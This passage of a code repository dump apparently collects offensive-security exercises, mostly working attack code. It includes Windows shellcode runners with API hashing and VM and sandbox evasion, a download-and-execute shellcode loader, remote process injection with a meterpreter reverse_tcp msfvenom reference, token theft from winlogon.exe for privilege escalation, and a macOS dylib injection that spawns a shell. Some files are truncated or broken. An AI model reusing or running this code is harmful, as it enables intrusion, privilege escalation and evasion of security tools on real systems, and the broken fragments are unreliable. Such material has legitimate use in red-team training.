"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58" 64 | "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" 65 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x3e\x48" 66 | "\x8d\x8d\x19\x01\x00\x00\x41\xba\x4c\x77\x26\x07\xff\xd5" 67 | "\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x0e\x01\x00" 68 | "\x00\x3e\x4c\x8d\x85\x13\x01\x00\x00\x48\x31\xc9\x41\xba" 69 | "\x45\x83\x56\x07\xff\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2" 70 | "\x56\xff\xd5\x6a\x6f\x61\x73\x00\x68\x65\x6c\x6c\x6f\x00" 71 | "\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00"; 72 | 73 | int main() { 74 | DWORD hashVirtualAlloc = 0xE0DABF; 75 | DWORD hashCreateThread = 0xF92F7B; 76 | DWORD hashWaitForSingleObject = CalculateHash("WaitForSingleObject"); 77 | 78 | std::cout << "Hash calculated for WaitForSingleObject: 0x" << std::hex << hashWaitForSingleObject << std::endl; 79 | 80 | HMODULE hKernel32 = GetModuleBase("kernel32.dll"); 81 | 82 | if (!hKernel32) { 83 | std::cerr << "Could not retrieve the base address of kernel32.dll.\n"; 84 | return -1; 85 | } 86 | 87 | typedef LPVOID(WINAPI* pVirtualAlloc_t)(LPVOID, SIZE_T, DWORD, DWORD); 88 | pVirtualAlloc_t pVirtualAlloc = (pVirtualAlloc_t)ResolveFunctionByHash(hKernel32, hashVirtualAlloc); 89 | if (!pVirtualAlloc) { 90 | std::cerr << "Could not find VirtualAlloc.\n"; 91 | return -1; 92 | } 93 | std::cout << "Hash calculated for VirtualAlloc: 0x" << std::hex << hashVirtualAlloc << std::endl; 94 | 95 | typedef HANDLE(WINAPI* pCreateThread_t)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); 96 | pCreateThread_t pCreateThread = (pCreateThread_t)ResolveFunctionByHash(hKernel32, hashCreateThread); 97 | if (!pCreateThread) { 98 | std::cerr << "Could not find CreateThread.\n"; 99 | return -1; 100 | } 101 | std::cout << "Hash calculated for CreateThread: 0x" << std::hex << hashCreateThread << std::endl; 102 | 103 | typedef DWORD(WINAPI* pWaitForSingleObject_t)(HANDLE, DWORD); 104 | pWaitForSingleObject_t pWaitForSingleObject = (pWaitForSingleObject_t)ResolveFunctionByHash(hKernel32, hashWaitForSingleObject); 105 | if (!pWaitForSingleObject) { 106 | std::cerr << "Could not find WaitForSingleObject.\n"; 107 | return -1; 108 | } 109 | 110 | std::cout << "Hash calculated for WaitForSingleObject: 0x" << std::hex << hashWaitForSingleObject << std::endl; 111 | 112 | LPVOID execMem = pVirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 113 | if (!execMem) { 114 | std::cerr << "Failed to allocate memory.\n"; 115 | return -1; 116 | } 117 | 118 | memcpy(execMem, shellcode, sizeof(shellcode)); 119 | 120 | HANDLE hThread = pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)execMem, NULL, 0, NULL); 121 | if (!hThread) { 122 | std::cerr << "Failed to create thread.\n"; 123 | return -1; 124 | } 125 | 126 | pWaitForSingleObject(hThread, INFINITE); 127 | 128 | return 0; 129 | } 130 | -------------------------------------------------------------------------------- /dylib-injection.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | __attribute__((constructor)) 6 | 7 | void myconstructor(int argc, const char **argv) 8 | { 9 | syslog(LOG_ERR, "[+] dylib injected in %s\\n", argv[0]); 10 | printf("[+] dylib injected in %s\\n", argv[0]); 11 | execv("/bin/bash", 0); 12 | //system("cp -r ~/Library/Messages/ /tmp/Messages/"); 13 | } 14 | -------------------------------------------------------------------------------- /htmlsmuggling.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Cat Image Download 6 | 11 | 12 | 13 |
14 |

Click on the Cat!

15 | Click on the cat to download file 17 |
18 | 19 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /main-hookchainshellcode.c: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | #include "hook.h" 7 | 8 | INT wmain(int argc, char* argv[]) 9 | { 10 | NTSTATUS status; 11 | PVOID shellAddress = NULL; 12 | HANDLE hProcess = (HANDLE)-1; 13 | DWORD dwPID = 0; 14 | 15 | if (argc >= 2) 16 | { 17 | dwPID = _wtoi(argv[1]); 18 | if (dwPID == 0) 19 | dwPID = atoi(argv[1]); 20 | } 21 | 22 | if (dwPID == 0) { 23 | char cPid[7]; 24 | 25 | printf("Type the pid: \n"); 26 | fgets(cPid, sizeof(cPid), stdin); 27 | dwPID = _wtoi(cPid); 28 | if (dwPID == 0) 29 | dwPID = atoi(cPid); 30 | } 31 | 32 | if (dwPID == 0) { 33 | printf("[!] Failed to get PID\n"); 34 | return 1; 35 | } 36 | 37 | printf("\n[+] Creating HookChain implants\n"); 38 | if (!InitApi()) { 39 | printf("[!] Failed to initialize API\n"); 40 | return 1; 41 | } 42 | 43 | printf("\n[+] HookChain implanted! \\o/\n\n"); 44 | 45 | printf("[*] Creating Handle onto PID %d\n", dwPID); 46 | 47 | POBJECT_ATTRIBUTES objectAttributes = (POBJECT_ATTRIBUTES)RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(OBJECT_ATTRIBUTES)); 48 | PCLIENT_ID clientId = (PCLIENT_ID)RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(CLIENT_ID)); 49 | clientId->UniqueProcess = dwPID; 50 | if (!NT_SUCCESS(NtOpenProcess(&hProcess, PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, objectAttributes, clientId))) { 51 | printf("[!] Failed to call OP: Status = 0x%08lx\n", GetLastError()); 52 | return 1; 53 | } 54 | 55 | printf("[*] Allocating memory at Handle 0x%p with READ_WRITE permissions\n", hProcess); 56 | 57 | SIZE_T memSize = 0x1000; 58 | if (!NT_SUCCESS(NtAllocateVirtualMemory(hProcess, &shellAddress, 0, &memSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE))) { 59 | printf("[!] Failed to call VA(shellAddress) with READ_WRITE permissions: Status = 0x%08lx\n", GetLastError()); 60 | return 1; 61 | } 62 | 63 | printf("[*] Injecting remote shellcode\n"); 64 | 65 | // Example shellcode to be executed (this is just a placeholder, replace with actual shellcode) 66 | // msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=eth0 lport=4231 -f c 67 | unsigned char shellcode[] = { 68 | 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 69 | // ... rest of the shellcode 70 | }; 71 | 72 | if (!WriteProcessMemory(hProcess, shellAddress, (LPCVOID)shellcode, sizeof(shellcode), NULL)) { 73 | printf("[!] Failed to call WriteProcessMemory(Shellcode): Status = 0x%08lx\n", GetLastError()); 74 | return 1; 75 | } 76 | 77 | printf("[*] Changing memory permissions to READ_EXECUTE\n"); 78 | 79 | ULONG oldProtect; 80 | if (!NT_SUCCESS(NtProtectVirtualMemory(hProcess, &shellAddress, &memSize, PAGE_EXECUTE_READ, &oldProtect))) { 81 | printf("[!] Failed to change memory permissions to READ_EXECUTE: Status = 0x%08lx\n", GetLastError()); 82 | return 1; 83 | } 84 | 85 | printf("[*] Calling CreateRemoteThreadEx to execute the shellcode\n"); 86 | HANDLE hThread = CreateRemoteThreadEx(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)shellAddress, NULL, NULL, NULL, NULL); 87 | if (hThread == NULL) { 88 | printf("[!] Failed to call CRT: Status = 0x%08lx\n", GetLastError()); 89 | return 1; 90 | } 91 | 92 | //Disable Hook prints 93 | SetDebug(FALSE); 94 | 95 | printf("[+] Shellcode OK!\n"); 96 | printf("[+] Altered by Joas A Santos!\n"); 97 | printf("\n\n _ _ _____ _____ _ _ _______ _ _ _______ _____ __ _\n |_____| | | | | |____/ | |_____| |_____| | | \\ |\n | | |_____| |_____| | \\_ |_____ | | | | __|__ | \\_|\n By M4v3r1ck\n\n"); 98 | return 0x00; 99 | 100 | } 101 | -------------------------------------------------------------------------------- /privilege-escalation/token-manipulation.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | DWORD GetProcessIdByName(const wchar_t* processName) { 6 | DWORD processId = 0; 7 | HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 8 | if (hSnap == INVALID_HANDLE_VALUE) return 0; 9 | 10 | PROCESSENTRY32 pe; 11 | pe.dwSize = sizeof(PROCESSENTRY32); 12 | 13 | if (Process32First(hSnap, &pe)) { 14 | do { 15 | if (_wcsicmp(pe.szExeFile, processName) == 0) { 16 | processId = pe.th32ProcessID; 17 | break; 18 | } 19 | } while (Process32Next(hSnap, &pe)); 20 | } 21 | 22 | CloseHandle(hSnap); 23 | return processId; 24 | } 25 | 26 | BOOL ElevatePrivileges() { 27 | DWORD pid = GetProcessIdByName(L"winlogon.exe"); // Privileged process 28 | if (pid == 0) { 29 | std::wcout << L"Error: Could not retrieve winlogon.exe PID\n"; 30 | return FALSE; 31 | } 32 | 33 | HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid); 34 | if (!hProcess) { 35 | std::wcout << L"Error: Failed to open winlogon.exe process\n"; 36 | return FALSE; 37 | } 38 | 39 | HANDLE hToken; 40 | if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &hToken)) { 41 | std::wcout << L"Error: Failed to retrieve process token\n"; 42 | CloseHandle(hProcess); 43 | return FALSE; 44 | } 45 | 46 | HANDLE hNewToken; 47 | if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) { 48 | std::wcout << L"Error: Failed to duplicate token\n"; 49 | CloseHandle(hToken); 50 | CloseHandle(hProcess); 51 | return FALSE; 52 | } 53 | 54 | // Create a new elevated process with the manipulated token 55 | STARTUPINFO si = { sizeof(si) }; 56 | PROCESS_INFORMATION pi; 57 | if (!CreateProcessWithTokenW(hNewToken, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &si, &pi)) { 58 | std::wcout << L"Error: Failed to create process with duplicated token\n"; 59 | CloseHandle(hNewToken); 60 | CloseHandle(hToken); 61 | CloseHandle(hProcess); 62 | return FALSE; 63 | } 64 | 65 | std::wcout << L"Elevated process successfully created!\n"; 66 | CloseHandle(hNewToken); 67 | CloseHandle(hToken); 68 | CloseHandle(hProcess); 69 | return TRUE; 70 | } 71 | 72 | int main() { 73 | if (ElevatePrivileges()) { 74 | std::wcout << L"Privileges successfully elevated!\n"; 75 | } 76 | else { 77 | std::wcout << L"Privilege escalation failed.\n"; 78 | } 79 | return 0; 80 | } 81 | -------------------------------------------------------------------------------- /shellcode-runner-Movfuscator.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | unsigned char buf[] = 6 | "\x31,,,," 7 | 8 | void execute_shellcode() { 9 | size_t shellcode_size = sizeof(shellcode); 10 | 11 | void* exec = mmap(NULL, shellcode_size, PROT_READ | PROT_WRITE | PROT_EXEC, 12 | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 13 | 14 | if (exec == MAP_FAILED) { 15 | _exit(1); 16 | } 17 | 18 | memcpy(exec, shellcode, shellcode_size); 19 | 20 | void (*func)(); 21 | func = (void (*)())exec; 22 | func(); 23 | } 24 | 25 | int main() { 26 | execute_shellcode(); 27 | return 0; 28 | } 29 | -------------------------------------------------------------------------------- /shellcode-runner-exercise12.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | bool IsVirtualMachine() { 7 | const std::vector> registryChecks = { 8 | {HKEY_LOCAL_MACHINE, L"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0"}, 9 | {HKEY_LOCAL_MACHINE, L"HARDWARE\\Description\\System"}, 10 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Control\\SystemInformation"}, 11 | {HKEY_LOCAL_MACHINE, L"HARDWARE\\ACPI\\DSDT\\VBOX__"}, 12 | {HKEY_LOCAL_MACHINE, L"HARDWARE\\ACPI\\FADT\\VBOX__"}, 13 | {HKEY_LOCAL_MACHINE, L"HARDWARE\\ACPI\\RSDT\\VBOX__"}, 14 | {HKEY_LOCAL_MACHINE, L"SOFTWARE\\Oracle\\VirtualBox Guest Additions"}, 15 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Services\\VBoxGuest"}, 16 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Services\\VBoxMouse"}, 17 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Services\\VBoxService"}, 18 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Services\\VBoxSF"}, 19 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Services\\VBoxVideo"}, 20 | {HKEY_LOCAL_MACHINE, L"SOFTWARE\\VMware, Inc.\\VMware Tools"}, 21 | {HKEY_LOCAL_MACHINE, L"SOFTWARE\\Wine"}, 22 | {HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Virtual Machine\\Guest\\Parameters"}, 23 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum"}, 24 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Enum\\IDE"}, 25 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Enum\\SCSI"} 26 | }; 27 | 28 | for (const auto& regCheck : registryChecks) { 29 | HKEY hKey; 30 | if (RegOpenKeyExW(regCheck.first, regCheck.second.c_str(), 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 31 | RegCloseKey(hKey); 32 | return true; 33 | } 34 | } 35 | 36 | const std::vector fileChecks = { 37 | L"system32\\drivers\\VBoxMouse.sys", 38 | L"system32\\drivers\\VBoxGuest.sys", 39 | L"system32\\drivers\\VBoxSF.sys", 40 | L"system32\\drivers\\VBoxVideo.sys", 41 | L"system32\\vboxdisp.dll", 42 | L"system32\\vboxhook.dll", 43 | L"system32\\vboxmrxnp.dll", 44 | L"system32\\vboxogl.dll", 45 | L"system32\\vboxoglarrayspu.dll", 46 | L"system32\\vboxoglcrutil.dll", 47 | L"system32\\vboxoglerrorspu.dll", 48 | L"system32\\vboxoglfeedbackspu.dll", 49 | L"system32\\vboxoglpackspu.dll", 50 | L"system32\\vboxoglpassthroughspu.dll", 51 | L"system32\\vboxservice.exe", 52 | L"system32\\vboxtray.exe", 53 | L"system32\\VBoxControl.exe", 54 | L"system32\\drivers\\vmmouse.sys", 55 | L"system32\\drivers\\vmhgfs.sys", 56 | L"system32\\drivers\\vm3dmp.sys", 57 | L"system32\\drivers\\vmci.sys", 58 | L"system32\\drivers\\vmhgfs.sys", 59 | L"system32\\drivers\\vmmemctl.sys", 60 | L"system32\\drivers\\vmmouse.sys", 61 | L"system32\\drivers\\vmrawdsk.sys", 62 | L"system32\\drivers\\vmusbmouse.sys" 63 | }; 64 | 65 | for (const auto& fileCheck : fileChecks) { 66 | if (GetFileAttributesW(fileCheck.c_str()) != INVALID_FILE_ATTRIBUTES) { 67 | return true; 68 | } 69 | } 70 | 71 | return false; 72 | } 73 | 74 | bool IsSandboxByResolution() { 75 | int screenWidth = GetSystemMetrics(SM_CXSCREEN); 76 | int screenHeight = GetSystemMetrics(SM_CYSCREEN); 77 | 78 | const int sandboxResolutions[][2] = { 79 | {1024, 768}, 80 | {800, 600}, 81 | {640, 480} 82 | }; 83 | 84 | for (const auto& resolution : sandboxResolutions) { 85 | if (screenWidth == resolution[0] && screenHeight == resolution[1]) { 86 | return true; 87 | } 88 | } 89 | 90 | return false; 91 | } 92 | 93 | bool IsSandboxByMouseMovement() { 94 | POINT pt; 95 | GetCursorPos(&pt); 96 | if (pt.x == 0 && pt.y == 0) { 97 | return true; 98 | } 99 | return false; 100 | } 101 | 102 | bool IsVirtualDisk() { 103 | HANDLE hDevice = CreateFileW(L"\\\\.\\PhysicalDrive0", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); 104 | if (hDevice == INVALID_HANDLE_VALUE) { 105 | std::cerr << "Failed to open device." << std::endl; 106 | return false; 107 | } 108 | 109 | STORAGE_PROPERTY_QUERY storagePropertyQuery; 110 | DWORD bytesReturned; 111 | char buffer[10000]; 112 | 113 | memset(&storagePropertyQuery, 0, sizeof(STORAGE_PROPERTY_QUERY)); 114 | storagePropertyQuery.PropertyId = StorageDeviceProperty; 115 | storagePropertyQuery.QueryType = PropertyStandardQuery; 116 | 117 | if (DeviceIoControl(hDevice, IOCTL_STORAGE_QUERY_PROPERTY, &storagePropertyQuery, sizeof(STORAGE_PROPERTY_QUERY), 118 | &buffer, sizeof(buffer), &bytesReturned, NULL)) { 119 | STORAGE_DEVICE_DESCRIPTOR* deviceDescriptor = (STORAGE_DEVICE_DESCRIPTOR*)buffer; 120 | char vendorId[256] = { 0 }; 121 | char productId[256] = { 0 }; 122 | 123 | if (deviceDescriptor->VendorIdOffset != 0) { 124 | strcpy_s(vendorId, sizeof(vendorId), buffer + deviceDescriptor->VendorIdOffset); 125 | } 126 | if (deviceDescriptor->ProductIdOffset != 0) { 127 | strcpy_s(productId, sizeof(productId), buffer + deviceDescriptor->ProductIdOffset); 128 | } 129 | 130 | std::cout << "Vendor ID: " << vendorId << std::endl; 131 | std::cout << "Product ID: " << productId << std::endl; 132 | 133 | if (strstr(vendorId, "VMware") || strstr(vendorId, "VBOX") || strstr(productId, "Virtual")) { 134 | CloseHandle(hDevice); 135 | return true; 136 | } 137 | } 138 | else { 139 | std::cerr << "DeviceIoControl failed." << std::endl; 140 | CloseHandle(hDevice); 141 | return false; 142 | } 143 | 144 | CloseHandle(hDevice); 145 | return false; 146 | } 147 | 148 | int main() { 149 | if (IsVirtualMachine()) { 150 | std::cout << "Running in a virtual machine environment.\n"; 151 | return 1; 152 | } 153 | 154 | if (IsSandboxByResolution()) { 155 | std::cout << "Running in a sandbox environment (resolution check).\n"; 156 | return 1; 157 | } 158 | 159 | if (IsSandboxByMouseMovement()) { 160 | std::cout << "Running in a sandbox environment (mouse movement check).\n"; 161 | return 1; 162 | } 163 | 164 | if (IsVirtualDisk()) { 165 | std::cout << "Running in a virtual environment (HDD check).\n"; 166 | return 1; 167 | } 168 | 169 | unsigned char shellcode[] = "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41" 170 | "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60" 171 | "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72" 172 | "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"; 173 | 174 | void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_READWRITE); 175 | 176 | memcpy(exec, shellcode, sizeof(shellcode)); 177 | 178 | DWORD oldProtect; 179 | VirtualProtect(exec, sizeof(shellcode), PAGE_EXECUTE_READ, &oldProtect); 180 | 181 | void(*func)(); 182 | func = (void(*)())exec; 183 | func(); 184 | 185 | VirtualFree(exec, 0, MEM_RELEASE); 186 | return 0; 187 | } 188 | -------------------------------------------------------------------------------- /shellcode-runner-exercises13.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #pragma comment(lib, "wininet.lib") 7 | 8 | bool IsVirtualMachine() { 9 | const std::vector> registryChecks = { 10 | {HKEY_LOCAL_MACHINE, L"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0"}, 11 | {HKEY_LOCAL_MACHINE, L"HARDWARE\\Description\\System"}, 12 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Control\\SystemInformation"}, 13 | {HKEY_LOCAL_MACHINE, L"HARDWARE\\ACPI\\DSDT\\VBOX__"}, 14 | {HKEY_LOCAL_MACHINE, L"HARDWARE\\ACPI\\FADT\\VBOX__"}, 15 | {HKEY_LOCAL_MACHINE, L"HARDWARE\\ACPI\\RSDT\\VBOX__"}, 16 | {HKEY_LOCAL_MACHINE, L"SOFTWARE\\Oracle\\VirtualBox Guest Additions"}, 17 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Services\\VBoxGuest"}, 18 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Services\\VBoxMouse"}, 19 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Services\\VBoxService"}, 20 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Services\\VBoxSF"}, 21 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\ControlSet001\\Services\\VBoxVideo"}, 22 | {HKEY_LOCAL_MACHINE, L"SOFTWARE\\VMware, Inc.\\VMware Tools"}, 23 | {HKEY_LOCAL_MACHINE, L"SOFTWARE\\Wine"}, 24 | {HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Virtual Machine\\Guest\\Parameters"}, 25 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum"}, 26 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Enum\\IDE"}, 27 | {HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Enum\\SCSI"} 28 | }; 29 | 30 | for (const auto& regCheck : registryChecks) { 31 | HKEY hKey; 32 | if (RegOpenKeyExW(regCheck.first, regCheck.second.c_str(), 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 33 | RegCloseKey(hKey); 34 | return true; 35 | } 36 | } 37 | 38 | const std::vector fileChecks = { 39 | L"system32\\drivers\\VBoxMouse.sys", 40 | L"system32\\drivers\\VBoxGuest.sys", 41 | L"system32\\drivers\\VBoxSF.sys", 42 | L"system32\\drivers\\VBoxVideo.sys", 43 | L"system32\\vboxdisp.dll", 44 | L"system32\\vboxhook.dll", 45 | L"system32\\vboxmrxnp.dll", 46 | L"system32\\vboxogl.dll", 47 | L"system32\\vboxoglarrayspu.dll", 48 | L"system32\\vboxoglcrutil.dll", 49 | L"system32\\vboxoglerrorspu.dll", 50 | L"system32\\vboxoglfeedbackspu.dll", 51 | L"system32\\vboxoglpackspu.dll", 52 | L"system32\\vboxoglpassthroughspu.dll", 53 | L"system32\\vboxservice.exe", 54 | L"system32\\vboxtray.exe", 55 | L"system32\\VBoxControl.exe", 56 | L"system32\\drivers\\vmmouse.sys", 57 | L"system32\\drivers\\vmhgfs.sys", 58 | L"system32\\drivers\\vm3dmp.sys", 59 | L"system32\\drivers\\vmci.sys", 60 | L"system32\\drivers\\vmhgfs.sys", 61 | L"system32\\drivers\\vmmemctl.sys", 62 | L"system32\\drivers\\vmmouse.sys", 63 | L"system32\\drivers\\vmrawdsk.sys", 64 | L"system32\\drivers\\vmusbmouse.sys" 65 | }; 66 | 67 | for (const auto& fileCheck : fileChecks) { 68 | if (GetFileAttributesW(fileCheck.c_str()) != INVALID_FILE_ATTRIBUTES) { 69 | return true; 70 | } 71 | } 72 | 73 | return false; 74 | } 75 | 76 | bool IsSandboxByResolution() { 77 | int screenWidth = GetSystemMetrics(SM_CXSCREEN); 78 | int screenHeight = GetSystemMetrics(SM_CYSCREEN); 79 | 80 | const int sandboxResolutions[][2] = { 81 | {1024, 768}, 82 | {800, 600}, 83 | {640, 480} 84 | }; 85 | 86 | for (const auto& resolution : sandboxResolutions) { 87 | if (screenWidth == resolution[0] && screenHeight == resolution[1]) { 88 | return true; 89 | } 90 | } 91 | 92 | return false; 93 | } 94 | 95 | bool IsSandboxByMouseMovement() { 96 | POINT pt; 97 | GetCursorPos(&pt); 98 | if (pt.x == 0 && pt.y == 0) { 99 | return true; 100 | } 101 | return false; 102 | } 103 | 104 | bool IsVirtualDisk() { 105 | HANDLE hDevice = CreateFileW(L"\\\\.\\PhysicalDrive0", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); 106 | if (hDevice == INVALID_HANDLE_VALUE) { 107 | std::cerr << "Failed to open device." << std::endl; 108 | return false; 109 | } 110 | 111 | STORAGE_PROPERTY_QUERY storagePropertyQuery; 112 | DWORD bytesReturned; 113 | char buffer[10000]; 114 | 115 | memset(&storagePropertyQuery, 0, sizeof(STORAGE_PROPERTY_QUERY)); 116 | storagePropertyQuery.PropertyId = StorageDeviceProperty; 117 | storagePropertyQuery.QueryType = PropertyStandardQuery; 118 | 119 | if (DeviceIoControl(hDevice, IOCTL_STORAGE_QUERY_PROPERTY, &storagePropertyQuery, sizeof(STORAGE_PROPERTY_QUERY), 120 | &buffer, sizeof(buffer), &bytesReturned, NULL)) { 121 | STORAGE_DEVICE_DESCRIPTOR* deviceDescriptor = (STORAGE_DEVICE_DESCRIPTOR*)buffer; 122 | char vendorId[256] = { 0 }; 123 | char productId[256] = { 0 }; 124 | 125 | if (deviceDescriptor->VendorIdOffset != 0) { 126 | strcpy_s(vendorId, sizeof(vendorId), buffer + deviceDescriptor->VendorIdOffset); 127 | } 128 | if (deviceDescriptor->ProductIdOffset != 0) { 129 | strcpy_s(productId, sizeof(productId), buffer + deviceDescriptor->ProductIdOffset); 130 | } 131 | 132 | std::cout << "Vendor ID: " << vendorId << std::endl; 133 | std::cout << "Product ID: " << productId << std::endl; 134 | 135 | if (strstr(vendorId, "VMware") || strstr(vendorId, "VBOX") || strstr(productId, "Virtual")) { 136 | CloseHandle(hDevice); 137 | return true; 138 | } 139 | } 140 | else { 141 | std::cerr << "DeviceIoControl failed." << std::endl; 142 | CloseHandle(hDevice); 143 | return false; 144 | } 145 | 146 | CloseHandle(hDevice); 147 | return false; 148 | } 149 | 150 | bool DownloadFile(const char* url, const char* localPath) { 151 | HINTERNET hInternet = InternetOpenA("Downloader", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 152 | if (hInternet == NULL) { 153 | std::cerr << "InternetOpenA failed." << std::endl; 154 | return false; 155 | } 156 | 157 | HINTERNET hUrl = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_RELOAD, 0); 158 | if (hUrl == NULL) { 159 | std::cerr << "InternetOpenUrlA failed." << std::endl; 160 | InternetCloseHandle(hInternet); 161 | return false; 162 | } 163 | 164 | HANDLE hFile = CreateFileA(localPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 165 | if (hFile == INVALID_HANDLE_VALUE) { 166 | std::cerr << "CreateFileA failed." << std::endl; 167 | InternetCloseHandle(hUrl); 168 | InternetCloseHandle(hInternet); 169 | return false; 170 | } 171 | 172 | char buffer[4096]; 173 | DWORD bytesRead; 174 | DWORD bytesWritten; 175 | BOOL bRead = InternetReadFile(hUrl, buffer, sizeof(buffer), &bytesRead); 176 | 177 | while (bRead && bytesRead > 0) { 178 | WriteFile(hFile, buffer, bytesRead, &bytesWritten, NULL); 179 | bRead = InternetReadFile(hUrl, buffer, sizeof(buffer), &bytesRead); 180 | } 181 | 182 | CloseHandle(hFile); 183 | InternetCloseHandle(hUrl); 184 | InternetCloseHandle(hInternet); 185 | 186 | return true; 187 | } 188 | 189 | bool ExecuteShellcodeFromFile(const char* filePath) { 190 | HANDLE hFile = CreateFileA(filePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 191 | if (hFile == INVALID_HANDLE_VALUE) { 192 | std::cerr << "CreateFileA failed." << std::endl; 193 | return false; 194 | } 195 | 196 | DWORD fileSize = GetFileSize(hFile, NULL); 197 | if (fileSize == INVALID_FILE_SIZE || fileSize == 0) { 198 | std::cerr << "Invalid file size." << std::endl; 199 | CloseHandle(hFile); 200 | return false; 201 | } 202 | 203 | unsigned char* shellcode = (unsigned char*)VirtualAlloc(NULL, fileSize, MEM_COMMIT, PAGE_READWRITE); 204 | if (shellcode == NULL) { 205 | std::cerr << "VirtualAlloc failed." << std::endl; 206 | CloseHandle(hFile); 207 | return false; 208 | } 209 | 210 | DWORD bytesRead; 211 | if (!ReadFile(hFile, shellcode, fileSize, &bytesRead, NULL) || bytesRead != fileSize) { 212 | std::cerr << "ReadFile failed." << std::endl; 213 | VirtualFree(shellcode, 0, MEM_RELEASE); 214 | CloseHandle(hFile); 215 | return false; 216 | } 217 | 218 | CloseHandle(hFile); 219 | 220 | DWORD oldProtect; 221 | if (!VirtualProtect(shellcode, fileSize, PAGE_EXECUTE_READ, &oldProtect)) { 222 | std::cerr << "VirtualProtect failed." << std::endl; 223 | VirtualFree(shellcode, 0, MEM_RELEASE); 224 | return false; 225 | } 226 | 227 | void(*func)(); 228 | func = (void(*)())shellcode; 229 | func(); 230 | 231 | VirtualFree(shellcode, 0, MEM_RELEASE); 232 | return true; 233 | } 234 | 235 | int main() { 236 | if (IsVirtualMachine()) { 237 | std::cout << "Running in a virtual machine environment.\n"; 238 | return 1; 239 | } 